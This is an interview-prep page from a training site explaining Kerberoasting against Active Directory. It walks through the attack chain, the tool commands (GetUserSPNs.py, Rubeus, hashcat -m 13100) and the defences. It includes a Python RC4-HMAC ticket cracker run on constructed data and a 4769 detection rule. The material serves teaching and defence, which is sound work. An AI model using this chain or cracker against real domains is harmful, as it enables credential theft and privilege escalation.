Active Directory · Ethical Hacking

Explain Kerberoasting attack with full chain.

Kerberoasting: request Kerberos service tickets (TGS) for service accounts and crack them offline to recover those accounts' passwords. No hash is "extracted from AD"; the ticket is encrypted with a key derived from the service account's password, and any authenticated domain user is entitled to ask for it. Chain: (1) As any domain user, query LDAP for user accounts with a servicePrincipalName set (setspn -Q */*, PowerView Get-DomainUser -SPN, or impacket GetUserSPNs.py). Computer accounts carry SPNs too, but their passwords are random 120-character strings, so user accounts are the targets. (2) Request a TGS for each SPN from the KDC. The ticket's enc-part is encrypted with the service account's long-term key: for RC4-HMAC (etype 23) that key is the account's NT hash; for AES it is derived from the password with PBKDF2 and a salt, which cracks far slower, so tools ask for RC4 wherever the account still allows it. (3) Export the tickets in hashcat format with Rubeus kerberoast or GetUserSPNs.py -request. (4) Crack offline: hashcat -m 13100 for RC4 tickets (19600/19700 for AES128/AES256) with rockyou.txt or custom wordlists; nothing touches the DC during cracking, so there are no lockouts. (5) Service accounts often have old, human-chosen passwords and more privilege than they need (local admin on servers, sometimes Domain Admin), so a cracked password is a privilege escalation. Defence: long random service account passwords (24+ chars) or Group Managed Service Accounts (gMSA, automatically rotated); remove RC4 from msDS-SupportedEncryptionTypes so only AES tickets are issued; strip SPNs and admin group memberships the account does not need; and alert on Event ID 4769 bursts where one account requests tickets with Ticket Encryption Type 0x17 for many distinct service names in a short window.
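The following is an added example, not code from the original page or from Rubeus, impacket or hashcat. It shows what steps (2) to (4) of the chain amount to cryptographically: the KDC encrypts the ticket enc-part under the service account's NT hash using RFC 4757 RC4-HMAC with key usage 2, the attacker writes that ciphertext out in the $krb5tgs$23$ line layout, and a cracker tests each candidate password by deriving the NT hash, decrypting, and checking the HMAC-MD5 checksum. MD4 and RC4 are implemented inline so the script runs on Python builds whose OpenSSL lacks the legacy MD4 provider. The service account name, realm, SPN, password and the plaintext standing in for the ASN.1 EncTicketPart are constructed for the demo; no domain is contacted.

```python
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. Windows NT hashes are MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for j, i in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[i] + k) & 0xFFFFFFFF, shifts[j % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (used by Kerberos etype 23 for the ticket body)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos long-term key of an account is exactly its NT hash."""
    return md4(password.encode("utf-16le"))


KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the ticket enc-part inside an AS-REP/TGS-REP


def _k1(key: bytes) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, key usage as 32-bit little-endian)
    return hmac.new(key, struct.pack("<I", KEY_USAGE_TICKET), hashlib.md5).digest()


def rc4hmac_encrypt(key: bytes, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """What the KDC does with the service key: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _k1(key)
    conf = os.urandom(8) if confounder is None else confounder
    checksum = hmac.new(k1, conf + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, conf + plaintext)


def key_matches(key: bytes, enc_part: bytes) -> bool:
    """The per-candidate test a cracker runs: decrypt, then verify the HMAC-MD5 checksum."""
    k1 = _k1(key)
    checksum, edata = enc_part[:16], enc_part[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return hmac.compare_digest(hmac.new(k1, rc4(k3, edata), hashlib.md5).digest(), checksum)


def to_hashcat_13100(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """Same line layout impacket and Rubeus emit for etype 23 tickets (hashcat -m 13100)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack_13100(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one $krb5tgs$23$ line; returns the password or None."""
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only RC4-HMAC (etype 23) lines; AES tickets are hashcat 19600/19700")
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    enc_part = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if key_matches(nt_hash(candidate), enc_part):
            return candidate
    return None


def demo():
    # Constructed scenario (hypothetical account, realm and SPN): a service account with a
    # guessable password. The plaintext stands in for the real ASN.1 EncTicketPart.
    service_key = nt_hash("Summer2023!")
    enc_part = rc4hmac_encrypt(service_key, b"constructed EncTicketPart bytes", confounder=b"\x00" * 8)
    line = to_hashcat_13100("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", enc_part)
    found = crack_13100(line, ["password", "Welcome1", "Summer2023!", "Winter2024!"])
    return line, found


if __name__ == "__main__":
    line, found = demo()
    print(line)
    print("cracked:", found)
```

The check in key_matches is the whole reason the attack scales: one HMAC-MD5 and one RC4 pass per guess, no interaction with the KDC, and the NT hash it recovers is usable directly for Pass-the-Hash as well as for the password. An AES ticket would force a PBKDF2 derivation (4096 iterations by default) per guess, which is why removing RC4 from the account's supported encryption types is an effective defence even before passwords are rotated.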
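For the detection side of the defence, here is an added example (not from the original page, and not the logic of any particular SIEM) that runs the 4769 rule over a handful of constructed Security-log records. The field names follow the event's EventData (TargetUserName, ServiceName, TicketEncryptionType, Status); the accounts, timestamps and service names are made up. It flags an account that obtains RC4 (0x17) service tickets for several distinct user service accounts within a short window, ignores computer accounts and krbtgt since those are not crackable targets, and shows why the window matters: the same number of tickets spread over an hour is normal use, not a roast.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in Event ID 4769


def kerberoast_candidates(events, window_minutes=5, min_distinct=4, rc4_only=True):
    """Return {requesting account: [service accounts]} for accounts that obtained service
    tickets for at least `min_distinct` different user service accounts inside one window."""
    requests = defaultdict(list)
    for ev in events:
        if ev["Status"] != "0x0":          # failed requests yield no crackable ticket
            continue
        svc = ev["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue                        # machine accounts and TGT renewals are noise here
        if rc4_only and ev["TicketEncryptionType"] != RC4_HMAC:
            continue
        requests[ev["TargetUserName"]].append((datetime.fromisoformat(ev["TimeCreated"]), svc))
    flagged = {}
    for account, reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):      # sliding window anchored at each request
            in_window = {s for t, s in reqs[i:] if t - start <= timedelta(minutes=window_minutes)}
            if len(in_window) >= min_distinct:
                flagged[account] = sorted(in_window)
                break
    return flagged


def _ev(ts, user, service, etype, status="0x0"):
    return {"TimeCreated": ts, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}


# Constructed 4769 records for the demo, not real log data.
SAMPLE_EVENTS = [
    _ev("2024-03-01T09:00:01", "alice@CORP.LOCAL", "svc_sql", "0x12"),     # AES, routine use
    _ev("2024-03-01T09:00:05", "alice@CORP.LOCAL", "svc_legacy", "0x17"),  # one RC4 ticket to an old app
    _ev("2024-03-01T08:00:00", "dave@CORP.LOCAL", "svc_sql", "0x17"),      # RC4, but spread over an hour
    _ev("2024-03-01T08:20:00", "dave@CORP.LOCAL", "svc_http", "0x17"),
    _ev("2024-03-01T08:40:00", "dave@CORP.LOCAL", "svc_mq", "0x17"),
    _ev("2024-03-01T09:00:00", "dave@CORP.LOCAL", "svc_sp", "0x17"),
    _ev("2024-03-01T09:12:00", "bob@CORP.LOCAL", "svc_sql", "0x17"),       # burst: every SPN account in seconds
    _ev("2024-03-01T09:12:00", "bob@CORP.LOCAL", "SQL01$", "0x17"),        # computer account, ignored
    _ev("2024-03-01T09:12:01", "bob@CORP.LOCAL", "svc_http", "0x17"),
    _ev("2024-03-01T09:12:01", "bob@CORP.LOCAL", "svc_backup", "0x17"),
    _ev("2024-03-01T09:12:02", "bob@CORP.LOCAL", "krbtgt", "0x17"),        # TGT renewal, ignored
    _ev("2024-03-01T09:12:02", "bob@CORP.LOCAL", "svc_mq", "0x17"),
    _ev("2024-03-01T09:12:03", "bob@CORP.LOCAL", "svc_sp", "0x17"),
]


if __name__ == "__main__":
    for account, services in kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"{account}: RC4 tickets for {len(services)} service accounts: {', '.join(services)}")
```

Once RC4 has been disabled domain-wide, rerun the rule with rc4_only=False: the burst pattern still shows up as many distinct ServiceName values from one TargetUserName in seconds, only now with 0x12/0x11 tickets, and any remaining 0x17 request becomes a finding on its own.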
Want the full explanation? This is the atomic answer suitable for quick interview prep. For the structured deep-dive — including code samples, strong-answer vs weak-answer notes, common follow-up questions, and how this fits the larger ethical hacking topic — see the full Q&A on Networkers Home:

→ Ethical Hacking Interview Hub — Full Q&A with deep context

How Networkers Home prepares students for this kind of question

This question reflects real interview rounds at Bangalore's top product, BFSI, and GCC cybersecurity teams. Networkers Home's flagship courses include mock interview sessions drilling exactly these question patterns, with feedback from interviewers who have hired for the role.

→ View the complete ethical hacking interview prep hub
→ View the related Networkers Home course
→ Book a free career consultation

Related Active Directory questions

Active Directory

Q. What is BloodHound and how do you use it in AD pen-test?

BloodHound (SpecterOps) — Active Directory attack path visualisation tool. Workflow: (1) SharpHound (data collector) — gather AD info: users, groups, sessions, ACLs, GPOs. (2) Upload data to Neo4j-backed BloodHound GUI.…
Read full answer →
Active Directory

Q. Explain Pass-the-Hash, Pass-the-Ticket, and Pass-the-Key.

All authentication abuse techniques in Windows AD. PtH — use NTLM hash directly (without knowing password) to authenticate to remote service. Tools: Mimikatz sekurlsa::pth, Impacket secretsdump → wmiexec. PtT — use Kerbe…
Read full answer →